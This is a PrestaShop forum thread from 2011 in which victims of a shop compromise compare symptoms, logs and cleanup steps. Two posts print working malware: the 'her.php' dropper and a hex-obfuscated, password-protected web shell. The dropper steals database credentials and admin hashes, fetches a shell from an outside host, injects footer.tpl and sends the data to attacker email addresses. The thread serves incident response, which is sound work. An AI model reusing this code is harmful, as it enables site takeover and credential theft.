Muller

Footer.tpl vulnerability?


Hi all,

 

I use an SCM system. I was just about to commit some files when I saw, in the "unversioned" list of files, a new file which I did not remember creating. It's called "her.php" and it sits under the modules directory. So I opened it with a PHP editor, and here is the content:

 


<?php
error_reporting(0);
$shcode = "{literal}".base64_decode("[base64 string removed]")."{/literal}";
$shurl = "http://www.c2bill.it/stest/chkpnt/shell.txt";  
$msgurl = "http://www.c2bill.it/stest/chkpnt/sdata.php";
$mails = "samuvel_hitroy@aol.com, preop@gmx.com";
function deletedir($arg){   $d=opendir($arg);  while($f=readdir($d)){     if($f!="."&&$f!=".."){        if(is_dir($arg."/".$f))        deletedir($arg."/".$f);       else         unlink($arg."/".$f);     }  }  rmdir($arg);closedir($d);}
@include("../config/settings.inc.php");
///Host info
$hostvar = "host:".$_SERVER["HTTP_HOST"]."\n"."ref:".$_SERVER["HTTP_REFERER"]."\n"."path:".$_SERVER["SCRIPT_FILENAME"]."\n=====\n";
///Server info
$srvvar =  _DB_SERVER_."\n"._DB_USER_."\n"._DB_PASSWD_."\n"._DB_NAME_."\n"._DB_PREFIX_."\n"._COOKIE_KEY_."\n"._COOKIE_IV_."\n"._PS_VERSION_."\n=====\n";
///GET admin
mysql_connect(_DB_SERVER_,_DB_USER_,_DB_PASSWD_);
mysql_selectdb(_DB_NAME_);
$r = mysql_query("SELECT `email`, `passwd` FROM `"._DB_PREFIX_."employee` WHERE id_profile = 1");
while($ro=mysql_fetch_assoc($r)){$usrs .= $ro['email'].":".$ro['passwd']."\n";}
//Wride sploit
@deletedir("../tools/smarty/compile/");
@deletedir("../tools/smarty/cache/"); 
@deletedir("../tools/smarty_v2/"); 
@deletedir("../tools/smarty_v2/"); 
$fn = "../themes/"._THEME_NAME_."/footer.tpl";
$f = fopen($fn,"r");$ff = fread($f,filesize($fn));fclose($f);
$ff = str_replace("</body>","                                     ".$shcode."</body>",$ff);
$f = fopen($fn,"w");$rf = fwrite($f,$ff);fclose($f); 
if($rf>0) $wrres = "true"; else $wrres = "false";
//write shell
$sh = file_get_contents($shurl);
$shf = "../upload/".md5(date("r")).".php"; 
$f = fopen($shf,"w");$rf = fwrite($f,$sh);fclose($f);
$shf2 = "../download/".md5(date("r")).".php"; 
$f = fopen($shf2,"w");$rf = fwrite($f,$sh);fclose($f);
@unlink("../download/.htaccess");
$msg = $hostvar.$srvvar.$usrs."=====\nTemplate writed:".$wrres."\n=====\nShells:\n".$shf."\n".$shf2."\n=====\n";
@mail($mails,"new shop",$msg);
@file_get_contents($msgurl."?data=".base64_encode($msg));
@unlink(__FILE__);
?>

 

That looks like they're emailing all the back office user/passwords to the two emails specified at the top of the code.

 

Did someone hack into my computer and put this file there?

What do you think guys?

 

I'm running an anti-virus check obviously as I write this...


Weird, I had the same file, created today. It could be a new exploit or a timed virus that downloads this file on a given day. This is definitely created specifically for PrestaShop.

 

You should check your upload and download directories for php files, that are not named index.php. You should check your theme folder, footer.tpl file. It might have some new javascript at the end.

 

This file does send the username and passwords of employees. But that is useless, the passwords are hashed so you can not use them for login. But it also sends your database user name and password. You might want to change them just in case. If your mysql server is accessible externally they will be able to login.


Thanks.

 

I posted this on Reddit at:

 

I'm getting help there. I discovered new files in the download and upload directory, as well as modifications in my theme's footer.tpl which I deleted.

 

The file was only run on my localhost, not on the live server.


The file was not placed on the live server, only on my local machine.

I'm running 1.4.3.0.

 

Please go to the link I posted in my previous reply to Reddit.com, as some guys helped there finding out what the script actually does.

 

The question is how it happened, and how we stop it from happening again.


I have seen the same thing on another shop today.

Can you give us a list of 3rd party modules you use in your shop, and I can see if the same modules are used in the affected shop I found.


I have seen the same thing on another shop today.

Can you give us a list of 3rd party modules you use in your shop, and I can see if the same modules are used in the affected shop I found.

 

The only modules I use are the ones that came with 1.4.3.0. The only module I downloaded from prestashop.com is their own authorize.net SIM module. That's the only module I installed that did not come with PrestaShop already.


I just started using PrestaShop a few days ago to discover what it's all about. It works great, despite the hack today:

 

* working on an online server, the public_html was protected by .htaccess (this protection was disabled when I found out about it).

* I can't find her.php on the server anymore (in the apache-log I can see it)

 

Is there any more information I can give to help find out what caused this?

 

* PrestaShop: 1.4.4.0

* Theme: Matrice


Hi Muller,

First of all, I want to let you know that we take this sort of situation extremely seriously, and have already assigned it as the top priority to our most qualified developer, Maxence (who as you can see, is already on the case). He is investigating it to try to locate the source, even if it is from an external module. If you would like to speak with him directly, we invite you to PM him to give him any additional information that could be helpful.

 

I will let you know as soon as I receive more news, but please just know that we are working very hard to ensure that this will not happen again, not to you or anyone else in the PrestaShop community.

 

-Mike


I have also had the same thing happen tonight about 1 hour ago and I am looking for the source.

 

I think .htaccess files have been added, as well as a script in the download folder, but I can't open it.

 

Regards,

 

Mark.


We're working to find the solution for you, but in the meantime, you may want to check the suggestions posted on the reddit link that Muller posted near the top. Take those suggestions with a grain of salt, but they may be worth exploring on your local machine after a back-up.

 

-Mike


I've checked the Apache usage logs and couldn't find any IP address other than mine.

There was a GET command to her.php ... [23/Aug/2011:17:44:21 +0200] "GET /modules/her.php HTTP/1.1" 200 304 ...

 

In Download & Upload is a new file named: f48be302135d80a289c0e56fae37952e.php

These files are also dated 23/aug 17:44 - the same time footer.tpl changed.

 

Did it happen at the same time for everyone?


This also happened to me, running 1.4.3

 

I couldn't find the "her.php" but my footer.tpl was definitely changed.

 

The only 3rd party module I had installed was jbx_menu.

 

Did anyone else have this happen while running 1.4.4?


Dang it, I hope they can find the source of the problem soon. Just launched the site live, otherwise I would take it down. Might have to anyway!

 

Also, I am not familiar with the correct PrestaShop .htaccess file. How do I know what to remove from there? (I have cleaned everything else up)


Wow, this looks serious.

I discovered today that I have the same issue. I thought that I was the only one with a compromised PrestaShop installation, until I read this topic.

 

I'm running a 1.4.4 version, updated from 1.4.3

 

Today, I saw that my FO was messed up: the Category block was empty, my slideshow stopped working and the footer had shifted upwards. When I used Firebug to check the rendered HTML code, I saw links to 2 external sites. I'm afraid I don't remember anymore which sites those were linking to...

 

I checked my footer.tpl and found weird and suspicious code at the bottom. In addition, php files were added to the /upload and /download folders. Also, the .htaccess file (to deny access) in the /download folder was gone.

 

In my case, this happened right after I uploaded an HTML email file to my /mails/xx folder. This file was from someone else on the forum who I'm helping with an email layout problem. So my initial reaction was that this HTML file was somehow infected, but seeing similar issues with others, I wonder if that's the case...

 

I've attached both footer.tpl (with just the weird code) and one of added php files so the developers can have a look at it.

compromised.zip


I'm running 1.4.4 and my site went down at 2:00pm UK time. My webhost has just pointed me to this thread and I have the same files added to my upload and download folders along with the addition to the footer.tpl file.


The footer.tpl file and a file named menu.3 within the "cache" folder from the "jbx_menu" module were modified at the same time, so I don't know if that's relevant or not.


I'm using jbx_menu as well...

Can all the people who have posted here and encountered the same problem confirm that they are using this menu?


For anyone who finds a her.php file under their modules directory, you should do the following:

- Check the file creation time, write this down and delete the file from your server.

- Go to your apache raw access logs. You should be able to access it using hosting control panel.

- Find the line that corresponds to the file creation time you wrote down earlier.

- Copy the section starting 5 minutes before to 5 minutes after. Save it in a text file and share it here.

This data would help identify the root of the problem.

 

To see if you have been attacked, check the following:

- Is there any php file under your uploads or downloads directory apart from index.php?

- Is there a strange javascript at the end of your footer.tpl file?

 

If any of the above happens, change your mysql username and password.


I'm not using JBX_menu!

 

Strange thing is: I can't find anything in the log files about the new files created in the download and upload directory...


Ok, at least we can rule out the jbx_menu as the source of the problem...

 

Two more things.

 

First, I didn't see a her.php file in my modules folder but still had the infected footer.tpl and the suspicious php files in upload and download folders.

 

Second, I had a quick look at my downloaded PS 1.4.4 file (from the PrestaShop website) and found a .DS_Store file in the root folder. If my memory serves me well, this is a (hidden) archive file from MacOS systems. This file was thus also present on my server installation during my upgrade process. Probably not related to the issue but still worth mentioning.


Same thing for me.... I'm not using jbx_menu but JBSlider and JBVariousLinks.

PrestaShop 1.4.3 and same files in upload, download and code in footer.tpl in my theme folder.

 

SQL password changed... and wait...


The .DS_store is indeed from Mac, has probably nothing to do with the problem.

 

About her.php: The file is automatically deleted, the TS was lucky to see it in time...

 

Still: shouldn't you see every action in the apache log files? Like the creation of her.php, I can't find this. Or do you need different logfiles for this? (don't know much about those log files)


Same thing for me. I use PS 1.4.4 on a local server (not a live server), and code has been added to my theme's footer.php

 


I have just checked a second store I run and this has not been affected by this issue. I haven't got round to upgrading this store yet so it is still running version 1.3.7. It appears the issue only affects version 1.4.


Same problem in PrestaShop 1.4.4 with Matrice.

 

This code was added.

 

<?php 
if (isset($_GET['session2'])){
$auth_pass = "fa816edb83e95bf0c8da580bdfd491ef";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'[base64 string removed]'\x29\x29\x29\x3B",".");}?>

<?php
error_reporting(0);

$empty = "";

function filt($data)
{
if (is_array($data)){
	$datanew = "";
	foreach ($data as $key=>$val)
	{
		$datanew .= htmlspecialchars(stripslashes($key)."=".stripslashes($val))."&";
	}
}
else {
	$datanew = $data;
	$datanew = htmlspecialchars(stripslashes($datanew));
}
return $datanew;
}

   if(isset($_SERVER['HTTP_FORWARDED_FOR'])) $DATA_HTTP_FORWARDED_FOR=filt($_SERVER['HTTP_FORWARDED_FOR']); else $DATA_HTTP_FORWARDED_FOR=$empty;
   if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])) $DATA_HTTP_X_FORWARDED_FOR=filt($_SERVER['HTTP_X_FORWARDED_FOR']); else $DATA_HTTP_X_FORWARDED_FOR=$empty;
   if(isset($_SERVER['HTTP_FROM'])) $DATA_HTTP_FROM=filt($_SERVER['HTTP_FROM']); else $DATA_HTTP_FROM=$empty;
   if(isset($_SERVER['HTTP_CLIENT_IP'])) $DATA_HTTP_CLIENT_IP=filt($_SERVER['HTTP_CLIENT_IP']); else $DATA_HTTP_CLIENT_IP=$empty;
   if(isset($_SERVER['HTTP_HTTP_VIA'])) $DATA_HTTP_HTTP_VIA=filt($_SERVER['HTTP_HTTP_VIA']); else $DATA_HTTP_HTTP_VIA=$empty;
   if(isset($_SERVER['HTTP_XROXY_CONNECTION'])) $DATA_HTTP_XROXY_CONNECTION=filt($_SERVER['HTTP_XROXY_CONNECTION']); else $DATA_HTTP_XROXY_CONNECTION=$empty;
   if(isset($_SERVER['HTTP_PROXY_CONNECTION'])) $DATA_HTTP_PROXY_CONNECTION=filt($_SERVER['HTTP_PROXY_CONNECTION']); else $DATA_HTTP_PROXY_CONNECTION=$empty;
   if(isset($_SERVER['HTTP_PROXY_USER'])) $DATA_HTTP_PROXY_USER=filt($_SERVER['HTTP_PROXY_USER']); else $DATA_HTTP_PROXY_USER=$empty;
   if(isset($_SERVER['HTTP_PC_REMOTE_ADDR'])) $DATA_HTTP_PC_REMOTE_ADDR=filt($_SERVER['HTTP_PC_REMOTE_ADDR']); else $DATA_HTTP_PC_REMOTE_ADDR=$empty;
   if(isset($_SERVER['HTTP_X_REMOTECLIENT_IP'])) $DATA_HTTP_X_REMOTECLIENT_IP=filt($_SERVER['HTTP_X_REMOTECLIENT_IP']); else $DATA_HTTP_X_REMOTECLIENT_IP=$empty;
   if(isset($_SERVER['HTTP_PROXY_PORT'])) $DATA_HTTP_PROXY_PORT=filt($_SERVER['HTTP_PROXY_PORT']); else $DATA_HTTP_PROXY_PORT=$empty;
   if(isset($_SERVER['HTTP_USER_AGENT'])) $DATA_HTTP_USER_AGENT=filt($_SERVER['HTTP_USER_AGENT']); else $DATA_HTTP_USER_AGENT=$empty;
   if(isset($_SERVER['HTTP_REFERER'])) $DATA_HTTP_REFERER=filt($_SERVER['HTTP_REFERER']); else $DATA_HTTP_REFERER=$empty;
   if(isset($_SERVER['HTTP_ACCEPT'])) $DATA_HTTP_ACCEPT=filt($_SERVER['HTTP_ACCEPT']); else $DATA_HTTP_ACCEPT=$empty;
   if(isset($_SERVER['HTTP_CONNECTION'])) $DATA_HTTP_CONNECTION=filt($_SERVER['HTTP_CONNECTION']); else $DATA_HTTP_CONNECTION=$empty;
   if(isset($_SERVER['GATEWAY_INTERFACE'])) $DATA_GATEWAY_INTERFACE=filt($_SERVER['GATEWAY_INTERFACE']); else $DATA_GATEWAY_INTERFACE=$empty;
   if(isset($_SERVER['REQUEST_METHOD'])) $DATA_REQUEST_METHOD=filt($_SERVER['REQUEST_METHOD']); else $DATA_REQUEST_METHOD=$empty;
   if(isset($_COOKIE)) $_COOKIE=filt($_COOKIE); else $_COOKIE=$empty;
   if(isset($_POST)) $_POST=filt($_POST); else $_POST=$empty;

$data = "<pre>REQUEST_INFO_PAGE_4896485_CODE
REMOTE_ADDR=".filt($_SERVER['REMOTE_ADDR'])."
HTTP_CLIENT_IP=".$DATA_HTTP_CLIENT_IP."
HTTP_X_FORWARDED_FOR=".$DATA_HTTP_X_FORWARDED_FOR."
HTTP_X_FORWARDED=".$DATA_HTTP_FORWARDED_FOR."
HTTP_X_COMING_FROM=
HTTP_FORWARDED_FOR=".$DATA_HTTP_FORWARDED_FOR."
HTTP_FORWARDED=
HTTP_COMING_FROM=
HTTP_VIA=".$DATA_HTTP_HTTP_VIA."
HTTP_XROXY_CONNECTION=".$DATA_HTTP_XROXY_CONNECTION."
HTTP_PROXY_CONNECTION=".$DATA_HTTP_PROXY_CONNECTION."
HTTP_USER_AGENT=".$DATA_HTTP_USER_AGENT."
HTTP_ACCEPT=".$DATA_HTTP_ACCEPT."
HTTP_CONNECTION=".$DATA_HTTP_CONNECTION."
GATEWAY_INTERFACE=".$DATA_GATEWAY_INTERFACE."
REQUEST_METHOD=".$DATA_REQUEST_METHOD."
HTTP_REFERER=".$DATA_HTTP_REFERER."
POST=".$_POST."
COOKIE=".$_COOKIE."
</pre>
   ";

echo $data;
?>


Hi,

 

Same problem in 1.4.4 on a local install of PrestaShop.

My Apache shows that the her.php file appeared just after a series of admin actions. Here are the last:

 

 

127.0.0.1 - - [23/Aug/2011:23:27:54 +0200] "POST [...my_local_admin]/ajax.php HTTP/1.1" 200 - "http://localhost/[...my_local_admin]/index.php" "Mozilla/5.0 (Windows NT 5.1; rv:6.0) Gecko/20100101 Firefox/6.0"

127.0.0.1 - - [23/Aug/2011:23:27:58 +0200] "POST [...my_local_admin]/ajax.php?toggleScreencast HTTP/1.1" 200 - "http://localhost/[...my_local_admin]/index.php" "Mozilla/5.0 (Windows NT 5.1; rv:6.0) Gecko/20100101 Firefox/6.0"

127.0.0.1 - - [23/Aug/2011:23:27:55 +0200] "POST /[...my_local_admin]/index.php?tab=AdminModules&token=c76a0756b0d565653ca9aabf3e5a35e HTTP/1.1" 200 301411 "http://localhost/[...my_local_admin]/index.php" "Mozilla/5.0 (Windows NT 5.1; rv:6.0) Gecko/20100101 Firefox/6.0"

---- and now the her php file------

127.0.0.1 - - [23/Aug/2011:23:27:59 +0200] "GET /[...my_local_module_folder]/her.php HTTP/1.1" 200 - "http://localhost/_____Gedone/_Cap_Expresso/html/www2.capexpresso.com/admincap/index.php" "Mozilla/5.0 (Windows NT 5.1; rv:6.0) Gecko/20100101 Firefox/6.0"

 

But I can't find her.php in my modules folder...

 

And now my IE (that I rarely open) opens itself on http://ads.eorezo.com/cgi-bin/advert/getads?x_......

 

My two other sites (1.3.6, not upgraded to 1.4) on online servers don't seem to be affected by this problem...


same problem:

- e66943f1495e1631affdbddae8398209.php file in the download and upload folder

- script in the footer.tpl

 

My shop version is 1.4.2.5.

Is there any modification that I have to check?

If you find the solution for this hack, please tell us how we can protect the site, not just with a new release (it is not possible for me to update to a newer release).

 

regards,

Gabor


Same problem... interesting thing is I have a few PrestaShops on my server in the same root directory but in different folders, and just one of these was attacked (PS 1.4.3)...


would you advise going back to an older version?

 

replaced footer.tpl

removed several dodgy looking image files for house, pharmacy, car sales in Modules\avoir\ folder??!!

index.php had been amended

smarty.v2 removed and now reinstated


I forgot to mention, it happened to me before, a month ago!, I restored the whole shop and database.

Unfortunately, I didn't check if there is any strange additional file or modification or not.


I did check for other added or modified files when I discovered the hack, by searching for all files with a recent timestamp. The only, apparent, changes I could find have already been reported in this topic.

In short, these are the changes:

 

1) a script is added to the footer.tpl file in the active theme folder

2) a php file is created in both /upload and /download folders

3) .htaccess file in /download folder is deleted

 

4) tools/smarty/compile, tools/smarty/cache and tools/smarty_v2 are deleted (I haven't checked this myself)

 

5) if you're lucky enough to catch it, there is a her.php file in your /modules folder. But this file deletes itself after the hack attempt.

 

I would advise to check all this in your own installation and if needed restore a backup of your footer.tpl, delete the alien php files, restore .htaccess file in /download folder (not necessary if this folder is empty) and restore the smarty folders.

 

In addition, it is also important to change your password for access to your BO (though I think this info is sent encrypted to the hackers, but just to be safe) and to change the username/password of your database access (and change this in your BO accordingly).

 

Also, recompile and clear the cache (enable 'Force compile' and disable 'Cache' in your 'Preferences' tab in your BO and do a refresh of your website; don't forget to revert the settings afterwards).

 

And hopefully the Prestashop developers will find out the source of all this quickly.

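The checks collected in this thread (no PHP file other than index.php in /upload and /download, the /download .htaccess still in place, the Smarty folders present, nothing wrapped in {literal} directly in front of </body> in footer.tpl) can be run as one sweep. This is an added example, not code from the thread or from PrestaShop; the sample tree, the theme name mytheme and the placeholder file names are constructed for the demonstration.

```python
import re
import shutil
import tempfile
from pathlib import Path

# Indicators taken from the her.php listing and the reports in this thread.
DROP_DIRS = ("upload", "download")      # the dropper writes <md5>.php into both
WIPED_DIRS = ("tools/smarty/compile", "tools/smarty/cache", "tools/smarty_v2")
# The dropper puts "{literal}...{/literal}" directly in front of </body>.
INJECTED_FOOTER = re.compile(r"\{/literal\}\s*</body>", re.I)


def sweep(shop_root):
    """Return a sorted list of (indicator, relative_path) findings."""
    root = Path(shop_root)
    findings = []

    if (root / "modules" / "her.php").is_file():
        findings.append(("dropper", "modules/her.php"))

    for name in DROP_DIRS:
        folder = root / name
        if not folder.is_dir():
            continue
        for f in folder.iterdir():
            if f.is_file() and f.suffix.lower() == ".php" and f.name != "index.php":
                findings.append(("unexpected-php", f"{name}/{f.name}"))

    if (root / "download").is_dir() and not (root / "download" / ".htaccess").is_file():
        findings.append(("missing-htaccess", "download/.htaccess"))

    for rel in WIPED_DIRS:
        if not (root / rel).is_dir():
            findings.append(("missing-dir", rel))

    # Every theme is checked: the dropper edits whichever theme is active.
    for footer in root.glob("themes/*/footer.tpl"):
        text = footer.read_text(encoding="utf-8", errors="replace")
        if INJECTED_FOOTER.search(text):
            findings.append(("footer-injection", footer.relative_to(root).as_posix()))

    return sorted(findings)


def build_sample_tree(base, infected):
    """Constructed sample layout for the demo (not a real PrestaShop install)."""
    root = Path(base)
    for rel in WIPED_DIRS + DROP_DIRS + ("modules", "themes/mytheme"):
        (root / rel).mkdir(parents=True, exist_ok=True)
    for name in DROP_DIRS:
        (root / name / "index.php").write_text("<?php // placeholder\n")
    (root / "download" / ".htaccess").write_text("Deny from all\n")
    footer = root / "themes" / "mytheme" / "footer.tpl"
    footer.write_text('<div id="footer"></div>\n</body>\n</html>\n')
    if infected:
        # Reproduce only the observable side effects listed in the thread.
        for name in DROP_DIRS:
            shell = root / name / "0123456789abcdef0123456789abcdef.php"
            shell.write_text("<?php // placeholder\n")
        (root / "download" / ".htaccess").unlink()
        for rel in WIPED_DIRS:
            shutil.rmtree(root / rel)
        footer.write_text('<div id="footer"></div>\n'
                          "     {literal}<!-- placeholder -->{/literal}</body>\n</html>\n")
    return root


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        for kind, path in sweep(build_sample_tree(tmp, infected=True)):
            print(f"{kind:18} {path}")
```

A footer-injection hit means "review this file": a theme can legitimately end with a {literal} block, so compare against a backup or the SCM copy before restoring.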

same problem:

- e66943f1495e1631affdbddae8398209.php file in the download and upload folder

- script in the footer.tpl

 

Idem with 1.4.4.0 on local install.


same problem:

- e66943f1495e1631affdbddae8398209.php file in the download and upload folder

- script in the footer.tpl

 

Idem with 1.4.4.0 on local install.

 

Same issues here. Found extra files in both download and upload folders. Tried to revert to older backup files and it added an .htaccess to one of the folders.

 

What is the status of this situation? Does PS have a solution? This is very serious.


We were affected as well. v1.4.3.

 

Can confirm that smarty_v2 was deleted, there were the extra files in download and upload and the footer.tpl was changed (it wasn't the default template either, which was interesting).

 

My install of PS had all the modules so I'm going through and deleting the unused ones.


server log at about 5 min. before and 5 min after her.php(17:26:00)

Hope it is helpful

 

Edit:

Domain name is changed. Just for security

log.txt


Hi All,

I'm new to PrestaShop and just made my shop live. I was just browsing the forum and came across this hack.

I checked my files and it seems I have the same problem.

I deleted the .php files in the upload and download folders and got rid of the strange code inside the footer.tpl.

It appears my main .htaccess file was not altered. I added the .htaccess redirect as suggested on Reddit.

 

I'm considering a new install but, what if I get infected again?

 

any advice

 

tks

 

jesan


Looks like there are a few similar calls made. However, there are 3 hours between them.

 

xx.xxx.xxx.xxx - - [23/Aug/2011:13:27:30 +0200] "POST /admindir/index.php?tab=AdminModules&token=8a94cca32ee3c07af0bf7322428e09cc HTTP/1.1" 200 29229 "http://www.domainname.com/admindir/index.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.17) Gecko/20110420 Firefox/3.6.17"

 

yy.yyy.yy.yy - - [23/Aug/2011:16:33:36 +0200] "GET /sv/hem HTTP/1.1" 200 25448 "http://www.google.se/url?sa=t&source=web&cd=5&ved=0CEAQFjAE&url=http%3A%2F%2Fwww.domainname.com%2F&rct=j&q=domainname.com%2Bher.php&ei=rLpTTu-PG4aJrAeV6t3DDg&usg=AFQjCNFhhEF9BsO6NxutBpe4kvvZNPG1iA&cad=rjt" "Mozilla/5.0 (Windows NT 5.1; rv:6.0) Gecko/20100101 Firefox/6.0"


I got affected too.

so sad =(

:angry:

a lot of loss and resources wasted.

=(

If need anything to solve this let me know.

=)

 

 

Looks like there are a few similar calls made. However, there are 3 hours between them.

 

xx.xxx.xxx.xxx - - [23/Aug/2011:13:27:30 +0200] "POST /admindir/index.php?tab=AdminModules&token=8a94cca32ee3c07af0bf7322428e09cc HTTP/1.1" 200 29229 "http://www.domainname.com/admindir/index.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.17) Gecko/20110420 Firefox/3.6.17"

 

yy.yyy.yy.yy - - [23/Aug/2011:16:33:36 +0200] "GET /sv/hem HTTP/1.1" 200 25448 "http://www.google.se/url?sa=t&source=web&cd=5&ved=0CEAQFjAE&url=http%3A%2F%2Fwww.domainname.com%2F&rct=j&q=domainname.com%2Bher.php&ei=rLpTTu-PG4aJrAeV6t3DDg&usg=AFQjCNFhhEF9BsO6NxutBpe4kvvZNPG1iA&cad=rjt" "Mozilla/5.0 (Windows NT 5.1; rv:6.0) Gecko/20100101 Firefox/6.0"


I got affected too.

so sad =(

:angry:

a lot of loss and resources wasted.

=(

If need anything to solve this let me know.

=)

 

My guess at this time is that we are dealing with some kind of malware that has infected your computer; this malware then uses the module upload feature in PrestaShop to upload this file.

 

I would suggest the following until a more permanent fix is made.

 

1. Either remove write permission on modules folder, or uncomment the following code from

/admin/tabs/adminModules.php

function extractArchive($file)
{
/*
	global $currentIndex;
	$success = false;
	if (substr($file, -4) == '.zip')
	{
		if (!Tools::ZipExtract($file, _PS_MODULE_DIR_))
			$this->_errors[] = Tools::displayError('Error while extracting module (file may be corrupted).');
	}
	else
	{
		$archive = new Archive_Tar($file);
		if ($archive->extract(_PS_MODULE_DIR_))
			$success = true;
		else
			$this->_errors[] = Tools::displayError('Error while extracting module (file may be corrupted).');
	}

	@unlink($file);
	if ($success)
		Tools::redirectAdmin($currentIndex.'&conf=8'.'&token='.$this->token);
*/
}

2. Make sure your computer is safe! Scan for malware/viruses, use an up to date antivirus software. Make sure you have a firewall installed, even if you are behind a router, it is good to have a software firewall, especially if you use a wireless network at home or at work.


Tested upgrading to the SVN8151 version and saw the problem. Don't think it's from the localhost machine.

 

Observation:

her.php file added

upload dir with additional file

download dir with additional file

themes/prestashop/footer.tpl altered

smarty/cache/* changed

smarty/compile/* changed

 

Categories FO not showing

3rd party homecarousel not working anymore


My shop is not affected. I haven't the file her.php, nor the file footer.tpl affected.

 

My hosting is Spanish and my shop is only available in Spanish.

 

It is odd that stores are sometimes affected, and sometimes not. Could it be that the virus appears for a module such as Facebook?

 

Prestashop 1.4.4


OK, this has just happened to me again.

 

Yesterday my store went down and after reading this thread, I deleted the php file in the upload/download folders and reverted to the original footer file. I also had to reinstall the tools/smarty/compile and tools/smarty/cache folders along with smarty_v2 folder. After this everything seemed OK.

 

This morning exactly the same thing has happened again. This needs sorting ASAP.


I have just had my site restored by my host, Vidahost. I had tried to replace the tools directory and I still had problems with the login page, as there was a security error coming up in the browser.

 

So the only way that would eliminate this was to restore all the files and everything seems back to normal now.

 

Regards,

 

Mark.


I checked my store files and it seems I have the same problem.

 

I deleted the .php files in the upload and download folder and restored footer.tpl

I have also deleted all files in smarty/cache and smarty/compile

 

I did not find the file her.php in modules folder

 

prestashop 1.4.4.0


As Mike said, the whole team is working on this issue.

 

We are trying to fix it as fast as possible.

 

We will keep you informed of any progress.

 

Be assured that we do not take this problem lightly and that we are totally dedicated to fixing it.


Just checked my sites & my clients sites & it seems to be only 1.4.3 & 1.4.4 affected so far. One site is in maintenance mode & was still affected.

I'm now going to try a clean install on wamp & see what the logs say after.


Hello, can you search your full Apache log for the word "her.php" and copy all the lines found here? If you are on Linux:

grep -F "her.php" /path/to/your/apache/log

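An added example, not code from the thread or from PrestaShop: this Python script combines the two log requests made in this thread, the search for her.php and the window from 5 minutes before to 5 minutes after it. It matches her.php in the request path only (the word also turns up in referrers, as in the Google search line quoted earlier) and lists any AdminModules POST sent by the same client before the hit. The log lines, addresses and the admin123 folder name are constructed.

```python
import re
from datetime import datetime, timedelta

# Apache common/combined log format; trailing referrer and user agent are ignored.
LINE = re.compile(
    r'(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
WINDOW = timedelta(minutes=5)

# Constructed sample, modelled on the excerpts posted in this thread.
SAMPLE_LOG = [
    '192.0.2.10 - - [23/Aug/2011:17:30:02 +0200] "GET /index.php HTTP/1.1" 200 5120',
    '192.0.2.10 - - [23/Aug/2011:17:44:19 +0200] "POST /admin123/ajax.php?toggleScreencast HTTP/1.1" 200 -',
    '192.0.2.10 - - [23/Aug/2011:17:44:16 +0200] "POST /admin123/index.php?tab=AdminModules&token=PLACEHOLDER HTTP/1.1" 200 301411',
    '192.0.2.10 - - [23/Aug/2011:17:44:21 +0200] "GET /modules/her.php HTTP/1.1" 200 304',
    '198.51.100.7 - - [23/Aug/2011:17:46:00 +0200] "GET /sv/hem HTTP/1.1" 200 25448 "http://search.example/?q=her.php" "UA"',
    '192.0.2.10 - - [23/Aug/2011:17:55:00 +0200] "GET /index.php HTTP/1.1" 200 5120',
]


def parse(lines):
    """Parse access-log lines into dicts; lines that do not match are skipped."""
    records = []
    for raw in lines:
        m = LINE.match(raw)
        if not m:
            continue
        rec = m.groupdict()
        rec["when"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
        rec["raw"] = raw.rstrip("\n")
        records.append(rec)
    return records


def her_windows(lines, needle="/her.php"):
    """For each request whose path ends in `needle`, return the +/- 5 minute
    window and the AdminModules POSTs the same client sent before it."""
    records = parse(lines)
    reports = []
    for hit in records:
        if not hit["path"].split("?", 1)[0].endswith(needle):
            continue
        window = [r for r in records if abs(r["when"] - hit["when"]) <= WINDOW]
        # Log lines are not always in timestamp order (the excerpt in this
        # thread is not), so sort before reading the sequence.
        window.sort(key=lambda r: r["when"])
        module_posts = [
            r for r in window
            if r["method"] == "POST" and "tab=AdminModules" in r["path"]
            and r["client"] == hit["client"] and r["when"] <= hit["when"]
        ]
        reports.append({
            "hit": hit["raw"],
            "window": [r["raw"] for r in window],
            "module_posts": [r["raw"] for r in module_posts],
        })
    return reports


if __name__ == "__main__":
    for report in her_windows(SAMPLE_LOG):
        print("HIT   ", report["hit"])
        for line in report["module_posts"]:
            print("BEFORE", line)
        print(f"{len(report['window'])} lines in the 10-minute window")
```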

Hi all,

 

I run an audit on my customers and partners.

 

I hope that isn't my menu but above all isn't PrestaShop!

 

Ju'


Same problems here!

The shop went offline after my smarty_v2 folder content was removed.

I can't find her.php.

 

Already any suggestions for a fix?


Hello,

for all people affected by this problem, if possible we need your Apache log to check how this issue happened on your site and try to correct it as fast as possible. You can send your logs to Carl.

 

Regards


Last entry line in Apache log after local install on wamp

 

127.0.0.1 - - [24/Aug/2011:10:31:57 +0200] "GET /test_virus/modules/her.php HTTP/1.1" 200 -

 

Then the her.php has gone but footer.tpl has been modified.

 

PrestaShop 1.4.4

 

BTW this was a clean install with no extra modules. Zip downloaded from PrestaShop on 20/08/11

Edited by dazzza (see edit history)


Hello,

for all people affected by this problem, if possible we need your Apache log to check how this issue happened on your site and try to correct it as fast as possible. You can send your logs to Carl.

 

Regards

Attached is my log from this morning.

 

I installed niceforms and jbx_menu modules yesterday onto other sites on local host - these sites use the default theme and weren't affected.

 

I installed jbx_menu on this site this morning and shortly after the footer.tpl file in a custom theme was affected.

 

I can upload earlier logs if necessary - there is no other reference to her.php in my logs.

PurpleEdge.zip


I'm using jbx_menu as well...

Can all the people who have posted here and encountered the same problem confirm that they are using this menu?

 

I use the blocktopmenu from JBX too. No hack at all. BUT I run on IIS (no Apache), which has no .htaccess, so the script will not work. I also use a module called protect.tpl from samhda. It helps to protect your theme if script names are not known...

 

I use Geo-Targeting to block all the countries I don't sell to and for known bad-behaviour countries (listed on project honeypot or other similar.)

 

